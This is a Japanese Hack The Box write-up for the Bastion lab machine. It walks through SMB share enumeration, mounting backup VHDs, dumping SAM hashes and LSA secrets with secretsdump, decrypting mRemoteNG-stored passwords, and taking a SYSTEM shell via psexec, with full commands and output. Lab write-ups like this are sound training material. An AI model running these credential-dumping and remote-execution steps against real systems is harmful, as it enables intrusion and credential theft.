Hack The Box: Bastionのwriteup。
ノーヒントで掌握できた。
以下はnmapのスキャン結果。
└─$ nmap -Pn -A $RHOST -oG general-portscan.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-18 07:52 EDT
Nmap scan report for 10.129.136.29
Host is up (0.50s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -40m00s, deviation: 1h09m14s, median: -2s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-05-18T11:53:29
|_ start_date: 2025-05-18T11:50:49
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-05-18T13:53:28+02:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.03 seconds以下のSMBの共有フォルダを発見。
└─$ smbclient -L $RHOST
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.136.29 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)Backupsフォルダが特に目を引いたので接続してみた。
└─$ smbclient //$RHOST/Backups
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Apr 16 06:02:11 2019
.. D 0 Tue Apr 16 06:02:11 2019
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019Backupsフォルダの内容物を再帰的にダウンロード。
└─$ smbclient //$RHOST/Backups -c 'prompt OFF; recurse ON; mget *'
Password for [WORKGROUP\kali]:
getting file \note.txt of size 116 as note.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \SDT65CB.tmp of size 0 as SDT65CB.tmp (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \WindowsImageBackup\L4mpje-PC\MediaId of size 16 as WindowsImageBackup/L4mpje-PC/MediaId (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
parallel_read returned NT_STATUS_IO_TIMEOUT
NT_STATUS_INVALID_NETWORK_RESPONSE opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\BackupSpecs.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
NT_STATUS_CONNECTION_DISCONNECTED listing \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\*
NT_STATUS_CONNECTION_DISCONNECTED listing \WindowsImageBackup\L4mpje-PC\Catalog\*
NT_STATUS_CONNECTION_DISCONNECTED listing \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\*途中でダウンロードがタイムアウトしてしまった。
とりあえずダウンロードできたnote.txtを見てみた。
└─$ cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.システム管理者向けのメモで、「子会社とのVPNは低速だからバックアップファイルをローカルに転送するな」とのこと。
再度、Backupsフォルダに接続してみたところ、WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351以下に2つのVHD (Virtual Hard Disk)ファイルを発見。
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 07:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 07:45:32 2019
BackupSpecs.xml An 1186 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 07:45:32 20199b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhdのファイルサイズは約37.7メガバイトで、9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhdのファイルサイズは約5.4ギガバイトであった。
低速なVPN経由でダウンロードするにはいささか大きすぎる。
このような場合はVHDファイルをローカルマシンにマウントすれば良い。まず、Backupsフォルダをローカルマシンにマウントする。
sudo mkdir /mnt/myshare
sudo mount -t cifs //$RHOST/Backups /mnt/myshare -o rw
└─$ sudo mount -t cifs //$RHOST/Backups /mnt/myshare -o rw
Password for root@//10.129.136.29/Backups:
└─$ ls /mnt/myshare
note.txt SDT65CB.tmp WindowsImageBackup続いてVHDファイルをマウントする。
# mount 1st VHD file
sudo mkdir /mnt/vhd
sudo guestmount --add "/mnt/myshare/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" --ro /mnt/vhd -m /dev/sda1
└─$ sudo ls /mnt/vhd
'$Recycle.Bin' autoexec.bat config.sys 'Documents and Settings' pagefile.sys PerfLogs ProgramData 'Program Files' Recovery 'System Volume Information' Users Windows# mount 2nd VHD file
sudo mkdir /mnt/vhd2
sudo guestmount --add "/mnt/myshare/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd" --ro /mnt/vhd2 -m /dev/sda1
└─$ sudo ls -la /mnt/vhd2
total 400
drwxrwxrwx 1 root root 4096 Feb 22 2019 .
drwxr-xr-x 5 root root 4096 May 18 08:23 ..
drwxrwxrwx 1 root root 4096 Feb 22 2019 Boot
-rwxrwxrwx 1 root root 383786 Nov 20 2010 bootmgr
-rwxrwxrwx 1 root root 8192 Feb 22 2019 BOOTSECT.BAK
drwxrwxrwx 1 root root 4096 Feb 22 2019 'System Volume Information'
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhdを/mnt/vhdに、9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhdを/mnt/vhd2にそれぞれマウントした。
ファイルサイズ的に9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd (約5.4ギガバイト)の方を重点的に調べるべきであろう。
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhdを調べた結果、Windows\System32\configディレクトリより、以下のレジストリ・ファイルを発見。
- SAM
- SYSTEM
- SECURITY
上記のファイルをローカルマシンにコピーしてsecretsdumpでダンプしてみた。
# copy SAM, SECURITY, SYSTEM hive
sudo cp /mnt/vhd/Windows/System32/config/SAM .
sudo cp /mnt/vhd/Windows/System32/config/SYSTEM .
sudo cp /mnt/vhd/Windows/System32/config/SECURITY .
# dump
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL└─$ impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up... L4mpjeというユーザー名とbureaulampjeというパスワードを発見。
冒頭でのポートスキャン結果より、22番ポートでSSHが起動していることが確認できていたので、L4mpje:bureaulampjeで標的マシンにSSH接続してみた。
└─$ ssh L4mpje@$RHOST
L4mpje@10.129.136.29's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>
l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje
l4mpje@BASTION C:\Users\L4mpje>hostname
Bastion
l4mpje@BASTION C:\Users\L4mpje>
l4mpje@BASTION C:\Users\L4mpje>dir Desktop
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Users\L4mpje\Desktop
22-02-2019 16:27 <DIR> .
22-02-2019 16:27 <DIR> ..
18-05-2025 13:51 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 4.796.928.000 bytes free
l4mpje@BASTION C:\Users\L4mpje>type C:\Users\L4mpje\Desktop\user.txt
a0029b07683b5900e8218f6c5ce<REDACTED>SSH接続に成功し、一般ユーザーのフラグC:\Users\L4mpje\Desktop\user.txtを入手。
続いて権限昇格である。
標的マシンを列挙したところ、mRemoteNGというソフトウェアがインストールされていることに気づく。
l4mpje@BASTION C:\Users\L4mpje>powershell -ep bypass "Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVers
ion\Uninstall\*" | select displayname"
displayname
-----------
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.24.28127
mRemoteNG
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.24.28127 C:\Users\L4mpje\AppData\RoamingとC:\Users\L4mpje\AppData\Local以下にmRemoteNGというディレクトリを発見。
l4mpje@BASTION C:\Users\L4mpje>dir /a C:\Users\L4mpje\AppData\Roaming
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Users\L4mpje\AppData\Roaming
22-02-2019 15:01 <DIR> .
22-02-2019 15:01 <DIR> ..
22-02-2019 14:50 <DIR> Adobe
22-02-2019 14:52 <DIR> Microsoft
22-02-2019 15:03 <DIR> mRemoteNG
0 File(s) 0 bytes
5 Dir(s) 4.821.835.776 bytes free
l4mpje@BASTION C:\Users\L4mpje>dir /a C:\Users\L4mpje\AppData\Local
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Users\L4mpje\AppData\Local
22-02-2019 15:03 <DIR> .
22-02-2019 15:03 <DIR> ..
22-02-2019 14:50 <JUNCTION> Application Data [C:\Users\L4mpje\AppData\Local]
22-02-2019 14:50 <DIR> ConnectedDevicesPlatform
22-02-2019 14:50 <JUNCTION> History [C:\Users\L4mpje\AppData\Local\Microsoft\Windows\History]
22-02-2019 16:26 13.090 IconCache.db
22-02-2019 15:03 <DIR> Microsoft
22-02-2019 14:58 <DIR> Microsoft_Corporation
22-02-2019 15:01 <DIR> mRemoteNG
22-02-2019 14:52 <DIR> Packages
31-01-2022 18:10 <DIR> Temp
22-02-2019 14:50 <JUNCTION> Temporary Internet Files [C:\Users\L4mpje\AppData\Local\Microsoft\Windows\INetCache]
22-02-2019 14:50 <DIR> TileDataLayer
22-02-2019 14:50 <DIR> VirtualStore
1 File(s) 13.090 bytes
13 Dir(s) 4.821.835.776 bytes free SCPでmRemoteNGディレクトリの内容物を再帰的にダウンロード。
scp -r L4mpje@$RHOST:/C:/Users/L4mpje/AppData/Roaming/mRemoteNG ~/HTB/Dedicated-Labs/owasp10-windows/Bastion/Roaming
scp -r L4mpje@$RHOST:/c:/Users/L4mpje/AppData/Local/mRemoteNG/mRemoteNG.exe_Url_pjpxdehxpaaorqg2thmuhl11a34i3ave/1.76.11.40527 ~/HTB/Dedicated-Labs/owasp10-windows/Bastion/LocalC:\Users\L4mpje\AppData\Roaming\mRemoteNGからダウンロードしたconfCons.xmlというファイルの中にAdministratorのパスワードaEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==を発見。
└─$ cat confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
<Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections> パスワードはどうやらAES暗号化されており、Base64デコードしただけでは平文のパスワードは入手できなかった。
└─$ echo aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== | base64 -d
��������Va��Qt.ޙ��Y`5��
� 「mRemoteNG password decrypt」でググってみたところ、こちらのスクリプトを発見。このスクリプトを使ってconfCons.xmlからAdministratorのパスワードを復号できた。
└─$ python3 mremoteng_decrypt.py ~/HTB/Dedicated-Labs/owasp10-windows/Bastion/Roaming/mRemoteNG/confCons.xml
Name: DC
Hostname: 127.0.0.1
Username: Administrator
Password: thXLHM96BeKL0ER2
Name: L4mpje-PC
Hostname: 192.168.1.75
Username: L4mpje
Password: bureaulampjeAdministratorのパスワードはthXLHM96BeKL0ER2と判明。
Administrator:thXLHM96BeKL0ER2で標的マシンに高権限ユーザーとして接続できた。
└─$ impacket-psexec Administrator:thXLHM96BeKL0ER2@$RHOST cmd.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 10.129.136.29.....
[*] Found writable share ADMIN$
[*] Uploading file WwweaSiq.exe
[*] Opening SVCManager on 10.129.136.29.....
[*] Creating service jXaD on 10.129.136.29.....
[*] Starting service jXaD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemrootユーザーのフラグc:\users\administrator\desktop\root.txtを入手。
C:\Windows\system32> type c:\users\administrator\desktop\root.txt
010a0994489b0032d64f34d<REDACTED>